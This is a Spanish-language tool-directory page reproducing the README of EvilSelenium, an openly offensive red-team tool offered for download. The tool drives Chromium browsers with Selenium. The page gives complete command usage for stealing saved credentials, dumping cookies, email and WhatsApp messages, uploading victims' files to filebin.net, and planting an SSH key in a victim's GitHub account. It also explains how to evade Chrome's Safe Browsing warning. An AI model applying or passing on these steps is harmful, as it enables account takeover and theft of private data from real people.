Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
EvilSelenium — Armamenta Selenium para automatizar el robo de credenciales, volcado de cookies, exfiltración de correos electrónicos y extracción de archivos de navegadores Chromium para operaciones de red team. | Kitploit
Herramientas/GitHubGitHub/mrd0x/evilselenium
Herramientas de PhishingExfiltración de DatosRecopilación de InformaciónPost-ExplotaciónIngeniería SocialRed Teaming
GitHubmrd0x/evilselenium

EvilSelenium

Armamenta Selenium para automatizar el robo de credenciales, volcado de cookies, exfiltración de correos electrónicos y extracción de archivos de navegadores Chromium para operaciones de red team.

Ver Repositorio
605934hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

EvilSelenium

EvilSelenium es un nuevo proyecto que weaponiza Selenium para abusar de navegadores basados en Chromium. Las funcionalidades actuales son:

  • Robar credenciales almacenadas (mediante autofill)
  • Robar cookies
  • Tomar capturas de pantalla de sitios web
  • Volcar correos de Gmail/O365
  • Volcar mensajes de WhatsApp
  • Descargar y exfiltrar archivos
  • Agregar claves SSH a GitHub

O extiende la funcionalidad existente para adaptarla a tus necesidades (ej. descargar archivos del GDrive/OneDrive del usuario).

Nota

  1. Cuando se ejecute esta herramienta, terminará cualquier proceso de navegador existente para poder ejecutarse con el perfil de navegador del usuario que contiene las contraseñas y sesiones activas.

  2. Construí esta herramienta en aproximadamente una semana y no ejecuté tantas pruebas como debería, por lo que puede haber algunos errores.

  3. Los módulos de Selenium no siempre son estables. Debido a los cambios constantes en los sitios web, algunos módulos pueden fallar ocasionalmente. Haré todo lo posible por mantener los módulos existentes para asegurar que funcionen como se espera, pero ya estás advertido.

Uso

root@kitploit:~
EvilSelenium.exe /?

/help - Muestra este menú de ayuda.

SETUP:
/install - Instala chromedriver y Selenium webdriver. Ejecútalo una vez.

GLOBAL: (aceptado con cada comando)
/browserdir [appdata_local_routing] - Usa un navegador personalizado. La entrada debe ser la ruta dentro del directorio %appdatalocal% (por ejemplo, "Microsoft\Edge")

RECON:
/enumsavedsites [out_path] - Verifica qué sitios web tienen contraseñas guardadas mediante capturas de pantalla.
/screenshot [website] [out_path] - Captura de pantalla de una página web dada.

CREDENTIALS:
/autorun - Extrae credenciales guardadas de sitios web comunes.
/dynamicid [login_page] [username_id] [password_id] - Extrae credenciales guardadas de un sitio web, proporcionando el ID del campo de usuario y el ID del campo de contraseña.
/dynamicname [login_page] [username_name] [password_name] - Extrae credenciales guardadas de un sitio web, proporcionando el valor del nombre del campo de usuario y el valor del nombre del campo de contraseña.
/dynamicname2 [login_page] [username_position] [password_position] [username_name] [password_name] - Extrae credenciales guardadas de un sitio web, proporcionando el valor del nombre del campo de usuario, el valor del nombre del campo de contraseña y sus posiciones.

COOKIES:
/cookies [website] - Obtiene cookies de un sitio web dado.

MODULES:
/download [file_url] [seconds] - Descarga un archivo y especifica el tiempo de espera para que finalice la descarga. Las extensiones de archivo no deben ser ejecutables.
/exfil [local_file] [seconds] - Sube un archivo a filebin.net y muestra el enlace de descarga.
/gmail [out_path] [num_of_emails] - Obtiene correos de mail.google.com si el usuario está autenticado. Máximo 50 correos.
/outlook [out_path] [num_of_emails] - Obtiene correos de Outlook si el usuario está autenticado.
/o365 [out_path] [num_of_emails] - Obtiene correos de O365 Outlook si el usuario está autenticado.
/github [key] - Agrega tu clave SSH a GitHub si el usuario está autenticado.
/whatsapp [out_path] - Obtiene mensajes de WhatsApp si el usuario está autenticado (BETA).

Configuración

El comando /install descargará el Chrome Driver y Selenium WebDriver, que son los requisitos necesarios. EvilSelenium funcionará en versiones de Chrome 100-90.

Probado en Windows 10, Chrome v97 y v90.

root@kitploit:~
EvilSelenium.exe /install

Configuración global

Por defecto, EvilSelenium intentará usar la carpeta de Datos de Usuario de Google Chrome para recuperar datos, pero también se admiten otros navegadores basados en Chromium.
Para usar diferentes navegadores basados en Chrome debes agregar /browserdir seguido de la ruta del navegador en el directorio %localappdata%. Aquí hay ejemplos para algunos navegadores comunes (deben agregarse a cualquier comando CLI):

  1. Brave - /browserdir BraveSoftware\Brave-Browser
  2. Microsoft Edge - /browserdir Microsoft\Edge
  3. Vivaldi - /browserdir Vivaldi

Módulo de Reconocimiento

/enumsavedsites - Esto tomará capturas de pantalla de chrome://settings/passwords

/screenshot - Captura de pantalla de cualquier sitio web. Si el usuario está autenticado en el sitio web, obtienes capturas de pantalla autenticadas :).

Módulo de Credenciales

IMPORTANTE: El módulo de credenciales ELIMINARÁ COOKIES para robar credenciales del autofill. Idealmente, deberías usar el módulo de credenciales al final si deseas exportar cookies.

/autorun - Plantillas preconstruidas para sitios web comunes. Continuaré agregando más.

/dynamicid - Proporciona la URL de inicio de sesión junto con el ID del campo de entrada de usuario y el ID del campo de contraseña. Esto es equivalente a document.getElementById().

/dynamicname - Si los campos no tienen IDs, proporciona los valores de los nombres de los campos. Seleccionará el primer índice de los valores de los nombres. Esto es equivalente a document.getElementsByName()[0].value.

/dynamicname2 - Proporciona los valores de los nombres de los campos junto con su posición de índice. Esto es equivalente a document.getElementsByName()[x].value donde x es la posición proporcionada.

Módulo de Cookies

/cookies - Vuelca cookies del sitio web especificado.

Módulos Varios

Estos son módulos adicionales que construí para demostrar qué tipo de acciones puedes realizar con Selenium.

/download - Descarga un archivo y especifica el tiempo de espera para la descarga. Se debe agregar una extensión de archivo no ejecutable al archivo antes de descargar para evitar el aviso de Safebrowsing de Chrome.

/exfil - Sube un archivo a filebin.net y especifica el tiempo de espera para que se complete la subida. Una vez completada la subida, se escribe el enlace de descarga del archivo.

/gmail - Obtiene correos de mail.google.com si el usuario está autenticado. Máximo 50 correos.

/outlook - Obtiene correos de Outlook si el usuario está autenticado.

/o365 - Obtiene correos de O365 Outlook si el usuario está autenticado.

/github - Agrega tu clave SSH a GitHub si el usuario está autenticado.

/whatsapp - Obtiene mensajes de WhatsApp si el usuario está autenticado (BETA).

Comandos de Ejemplo

root@kitploit:~
EvilSelenium.exe /screenshot https://mail.google.com c:\users\mr.d0x\downloads

EvilSelenium.exe /dynamicid https://www.hybrid-analysis.com/login login_email login_password

EvilSelenium.exe /dynamicname https://linkedin.com session_key session_password

Demo

Example

Soporte

  • Sígueme en Twitter @mrd0x
  • Billetera BTC: 38ApE9ciNHiXzEaQExLXdwM6TrEpz2wCUi (para café obviamente)
Descargar herramienta